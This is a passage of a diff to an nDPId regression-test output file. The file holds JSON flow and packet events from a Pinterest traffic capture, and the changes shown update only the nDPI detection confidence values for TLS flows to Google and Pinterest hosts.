00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} 
-00685{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00685{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -171,67 +171,67 @@ 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
